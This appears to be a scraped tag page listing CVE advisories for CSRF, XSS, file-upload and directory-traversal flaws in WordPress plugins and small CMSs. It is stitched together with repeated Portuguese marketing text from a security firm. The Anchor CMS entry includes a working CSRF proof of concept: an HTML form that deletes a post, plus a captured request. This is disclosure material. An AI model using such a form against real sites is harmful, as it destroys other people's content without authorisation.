The OSMapper WordPress plugin through 2.1.5 contains an AJAX action to delete a plugin related post type named 'map' and is registered with the wp_ajax_nopriv prefix, making it available to unauthenticated users. There is no authorisation, CSRF and checks in place to ensure that the post to delete is a map one. As a result, unauthenticated user can delete arbitrary posts from the blog

CVE-2021-24978

The Menu Image, Icons made easy WordPress plugin before 3.0.8 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend

CVE-2022-0450

The Sermon Browser WordPress plugin through 0.45.22 does not have CSRF checks in place when uploading Sermon files, and does not validate them in any way, allowing attackers to make a logged in admin upload arbitrary files such as PHP ones.

CVE-2022-0499

TypesetterCMS v5.1 was discovered to contain a Cross-Site Request Forgery (CSRF) which is exploited via a crafted POST request.

**News**

**elFinder 2.1.50 in Upcoming Release**

12/28/2019

A new release for Typesetter is in the works with a lot of improvements including the ... Read More

**Typesetter 5.1**

8/12/2017

Typesetter 5.1 is now available for download. 5.1 includes bug fixes, UI/UX improvements, ... Read More

More News

CVE-2022-25523: User - Typesetter CMS

phpIPAM 1.4.4 allows Reflected XSS and CSRF via app/admin/subnets/find_free_section_subnets.php of the subnets functionality.

**Nossos números:**

**3,5MM+**Anomalias reportadas  
aos clientes em 2020**450+**Pessoas em Recife, São  
Paulo, Rio e Londres**500+**Clientes no Brasil, UK,  
LATAM e Europa**21+**Anos de experiência  

**Principais Serviços**

 

**Security Consulting**

Projetos de avaliações, testes e diagnósticos de resiliência e cibersegurança.

Saiba Mais

 

**Security Integration**

Desenhamos, instalamos e configuramos as soluções de segurança próprias e de parceiros, respeitando o fluxo do seu negócio.

Saiba Mais

 

**Managed Security Services**

Temos inteligência, tecnologias e profissionais altamente qualificados para apoiar sua empresa com projetos contínuos.

Saiba Mais

 

**Digital Identity**

O AllowMe agrega proteção e confiança à relação digital entre empresas e seus clientes.

Saiba Mais

**Trabalhamos com importantes parceiros de negócios para oferecer as melhores ferramentas em cibersegurança.**

Nosso portfólio de ponta a ponta inclui as soluções tecnológicas mais inovadoras do mercado desenvolvidas pelos maiores fabricantes internacionais.

Saiba mais

Assine nossa newsletter

Cadastre-se para receber novidades

CVE-2021-46426: Home - Tempest - Líder em Segurança Digital no Brasil!

**Nossos números:**

**3,5MM+**Anomalias reportadas  
aos clientes em 2020**450+**Pessoas em Recife, São  
Paulo, Rio e Londres**500+**Clientes no Brasil, UK,  
LATAM e Europa**21+**Anos de experiência  

**Principais Serviços**

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-13.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem7.png)

**Security Consulting**

Projetos de avaliações, testes e diagnósticos de resiliência e cibersegurança.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-07.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/usecase-buider.png)

**Security Integration**

Desenhamos, instalamos e configuramos as soluções de segurança próprias e de parceiros, respeitando o fluxo do seu negócio.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-09.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem12.png)

**Managed Security Services**

Temos inteligência, tecnologias e profissionais altamente qualificados para apoiar sua empresa com projetos contínuos.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-08.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem4.png)

**Digital Identity**

O AllowMe agrega proteção e confiança à relação digital entre empresas e seus clientes.

Saiba Mais

**Trabalhamos com importantes parceiros de negócios para oferecer as melhores ferramentas em cibersegurança.**

Nosso portfólio de ponta a ponta inclui as soluções tecnológicas mais inovadoras do mercado desenvolvidas pelos maiores fabricantes internacionais.

Saiba mais

Assine nossa newsletter

Cadastre-se para receber novidades

Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component anchor/routes/posts.php. This vulnerability allows attackers to arbitrarily delete posts.

**anchorcms-0.12.7-CSRF**

CSRF (Cross-site request forgery) Vulnerability discovered in Anchor CMS v0.12.7 and that can delete posts.

**Vulnerability Analysis**

Request interface for adding, deleting, modifying and checking posts in anchor/routes/posts.php.

let us see code it delete a posts.

https://github.com/anchorcms/anchor-cms/blob/master/anchor/routes/posts.php#L355

        /**
         * Delete post
         */
        Route::get('admin/posts/delete/(:num)', function ($id) {
            Post::find($id)->delete();
            Comment::where('post', '=', $id)->delete();
    
            Query::table(Base::table('post_meta'))
                 ->where('post', '=', $id)
                 ->delete();
    
            Notify::success(__('posts.deleted'));
    
            return Response::redirect('admin/posts');
        });
    

There is no check on token or referer and delete directly.

**Reproduce and PoC**

1.  Login in as a admin.
2.  create some posts for deleteing
3.  use brupsuite get a delete request packet

    GET /admin/posts/delete/6 HTTP/1.1
    Host: 192.168.1.89
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://192.168.1.89/admin/posts/edit/3
    Cookie: anchorcms=ng848botkffiu4c1lrgbgo50ri
    Upgrade-Insecure-Requests: 1
    
    

The request just delete a posts that id is 6.

4.  use brupsuite to generat a csrf PoC.

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.89/admin/posts/delete/6">
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Then save the PoC code to a exploit.html, and click exploit.html to csrf attack. ![1](https://user-images.githubusercontent.com/11525772/154665895-36b7575d-368d-495c-830e-80fc17bc02c0.jpg)

click it to send a request and delete it successfully. ![1645180292(1)](https://user-images.githubusercontent.com/11525772/154665976-e329e3d5-b820-43fa-a9c3-d8dce7f085b1.jpg)

CVE-2022-25576: GitHub - butterflyhack/anchorcms-0.12.7-CSRF: Vulnerability Analysis

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

CVE-2022-25266

Passwork On-Premise Edition before 4.6.13 allows migration/downloadExportFile Directory Traversal (to read files).

After authorization with the Owner account, it will be possible to read files located outside the web directory on the server

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25267

Passwork On-Premise Edition before 4.6.13 allows migration/uploadExportFile Directory Traversal (to upload files).

After logging in with the Owner account, an intruder has the ability to upload arbitrary files by sending specially generated HTTP requests

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25268

Passwork On-Premise Edition before 4.6.13 allows CSRF via the groups, password, and history subsystems.

CSRF token value does not change during the session and can be obtained by an attacker as a result of exploitation of the "Cross-site scripting" vulnerability.

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25269

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

An attacker can inject arbitrary HTML tags, including JavaScript scripts, into a page processed by a user's browser

Discoverer: Positive technologies, Roman Poneev

CVE-2022-25269: Description of CVE-2022-25266, CVE-2022-25267, CVE-2022-25268, CVE-2022-25269

Cross-Site Request Forgery (CSRF) in Yoo Slider – Image Slider & Video Slider (WordPress plugin) allows attackers to trick authenticated users into unwanted slider duplicate or delete action.

**yoo-slider**

**Software**

**Yoo Slider**

**Vulnerable Versions**

**<= 2.0.0**

**Fixed in version**

**2.1.0**

**CVE**

**CVE-2022-25608**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-03-21**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete discovered by Ngo Van Thien (Patchstack Alliance) in WordPress Yoo Slider plugin (versions <= 2.0.0).**

**Solution**

**Update the WordPress Yoo Slider plugin to the latest available version (at least 2.1.0).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25608: WordPress Yoo Slider plugin <= 2.0.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete - Patchstack

The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to reflected cross-site scripting due to missing sanitization of the files filename parameter found in the ~/includes/ajax/controllers/uploads.php file which can be used by unauthenticated attackers to add malicious web scripts to vulnerable WordPress sites, in versions up to and including 3.3.12.

Tag

#csrf